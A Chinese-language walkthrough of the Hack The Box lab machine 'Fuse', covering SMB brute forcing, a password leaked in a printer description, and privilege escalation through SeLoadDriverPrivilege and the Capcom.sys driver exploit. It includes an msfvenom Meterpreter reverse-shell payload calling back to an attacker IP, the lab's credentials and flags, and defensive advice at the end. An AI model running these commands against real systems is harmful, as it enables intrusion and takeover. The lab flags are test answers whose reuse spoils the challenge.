[Meachines] [Medium] Fuse smb+printer打印机配置泄露+SeLoadDriverPrivilege权限提升

字数 1253 2025-08-19 12:41:20

Windows权限提升：利用SMB打印机配置泄露和SeLoadDriverPrivilege漏洞

1. 信息收集阶段

1.1 初始扫描

使用Nmap进行端口扫描：

nmap -p- 10.10.10.193 --min-rate 1000 -sC -sV

发现开放端口：

53 (DNS)
80 (HTTP)
88 (Kerberos)
135/139/445 (SMB)
389/636 (LDAP)
5985 (WinRM)
其他RPC相关端口

1.2 服务识别

操作系统：Windows Server 2016 Standard (Build 14393)
域名：fabricorp.local
主机名：FUSE
Web服务器：Microsoft IIS 10.0

1.3 添加DNS记录

echo '10.10.10.193 fuse.fabricorp.local fabricorp.local' >> /etc/hosts

2. 用户枚举和密码爆破

2.1 获取用户名

从网页内容提取用户名：

pmerton
tlavel
sthompson
bhult
administrator

使用windapsearch.py进一步枚举AD用户：

python windapsearch.py --dc-ip 10.10.10.193 -u "" -U

发现更多用户：

astein
bnielson
dandrews
dmuir
mberbatov
svc-print
svc-scan

2.2 密码字典生成

使用cewl从网页生成密码字典：

cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers > password

2.3 SMB爆破

使用hydra进行爆破：

hydra -L username -P password 10.10.10.193 smb -t 100

成功凭证：

tlavel:Fabricorp01
bhult:Fabricorp01

3. SMB交互和密码修改

3.1 强制密码更改

smbpasswd -r 10.10.10.193 bhult

修改密码为：whoami@123!!

3.2 RPC客户端查询

rpcclient -U bhult%whoami@123!! 10.10.10.193

查询用户信息：

rpcclient $> querydispinfo

4. 打印机配置泄露

4.1 枚举打印机

rpcclient $> enumprinters

发现打印机信息泄露：

\\10.10.10.193\HP-MFT01
HP Universal Printing PCL 6
Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)

4.2 使用泄露密码测试其他服务

使用crackmapexec测试WinRM：

crackmapexec winrm 10.10.10.193 -u username -p '$fab@s3Rv1ce$1' --continue-on-success

成功凭证：

svc-print:$fab@s3Rv1ce$1

5. 初始访问

使用evil-winrm连接：

evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i 10.10.10.193

获取user flag：

2b8de354178a4e459233b51829b3dcb3

6. 权限提升准备

6.1 检查特权

whoami /priv

发现关键特权：

SeLoadDriverPrivilege

6.2 系统信息确认

Windows Server 2016 (Build 14393)
Windows Defender未启用

7. 权限提升利用

7.1 准备Meterpreter payload

msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.24 LPORT=10032 -f exe > /tmp/reverse.exe

设置监听：

msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 10032
exploit -j

7.2 上传利用工具

从GitHub获取SeLoadDriverPrivilege利用工具：
https://github.com/k4sth4/SeLoadDriverPrivilege

上传必要文件：

eoploaddriver_x64.exe
ExploitCapcom.exe
Capcom.sys
reverse.exe

7.3 执行权限提升

加载易受攻击的驱动：

.\eoploaddriver_x64.exe System\\CurrentControlSet\\dfserv C:\\Temp\\Capcom.sys

利用漏洞：

.\ExploitCapcom.exe LOAD C:\\Temp\Capcom.sys
.\ExploitCapcom.exe EXPLOIT

执行payload：

.\ExploitCapcom.exe EXPLOIT "c:\\TEMP\\reverse.exe"

7.4 获取root flag

608bf78beeccbbc4f3069a2f8d5095e5

8. 技术要点总结

打印机配置泄露：通过枚举打印机服务发现硬编码凭证
权限提升向量：利用SeLoadDriverPrivilege加载易受攻击的驱动
Windows版本限制：此方法在Windows 10 1803及更高版本和Windows Server 2019上不可用
防御规避：确认Windows Defender未启用，无需额外规避措施

9. 防御建议

避免在配置文件中存储明文凭证
限制SeLoadDriverPrivilege的分配
保持系统更新，特别是Windows Server 2016
启用Windows Defender实时保护
监控驱动加载行为

Windows权限提升：利用SMB打印机配置泄露和SeLoadDriverPrivilege漏洞 1. 信息收集阶段 1.1 初始扫描使用Nmap进行端口扫描：发现开放端口： 53 (DNS) 80 (HTTP) 88 (Kerberos) 135/139/445 (SMB) 389/636 (LDAP) 5985 (WinRM) 其他RPC相关端口 1.2 服务识别操作系统：Windows Server 2016 Standard (Build 14393) 域名：fabricorp.local 主机名：FUSE Web服务器：Microsoft IIS 10.0 1.3 添加DNS记录 2. 用户枚举和密码爆破 2.1 获取用户名从网页内容提取用户名：使用windapsearch.py进一步枚举AD用户：发现更多用户： 2.2 密码字典生成使用cewl从网页生成密码字典： 2.3 SMB爆破使用hydra进行爆破：成功凭证： tlavel:Fabricorp01 bhult:Fabricorp01 3. SMB交互和密码修改 3.1 强制密码更改修改密码为：whoami@123! ! 3.2 RPC客户端查询查询用户信息： 4. 打印机配置泄露 4.1 枚举打印机发现打印机信息泄露： 4.2 使用泄露密码测试其他服务使用crackmapexec测试WinRM：成功凭证： svc-print:$fab@s3Rv1ce$1 5. 初始访问使用evil-winrm连接：获取user flag： 6. 权限提升准备 6.1 检查特权发现关键特权： 6.2 系统信息确认 Windows Server 2016 (Build 14393) Windows Defender未启用 7. 权限提升利用 7.1 准备Meterpreter payload 设置监听： 7.2 上传利用工具从GitHub获取SeLoadDriverPrivilege利用工具： https://github.com/k4sth4/SeLoadDriverPrivilege 上传必要文件： 7.3 执行权限提升加载易受攻击的驱动：利用漏洞：执行payload： 7.4 获取root flag 8. 技术要点总结打印机配置泄露：通过枚举打印机服务发现硬编码凭证权限提升向量：利用SeLoadDriverPrivilege加载易受攻击的驱动 Windows版本限制：此方法在Windows 10 1803及更高版本和Windows Server 2019上不可用防御规避：确认Windows Defender未启用，无需额外规避措施 9. 防御建议避免在配置文件中存储明文凭证限制SeLoadDriverPrivilege的分配保持系统更新，特别是Windows Server 2016 启用Windows Defender实时保护监控驱动加载行为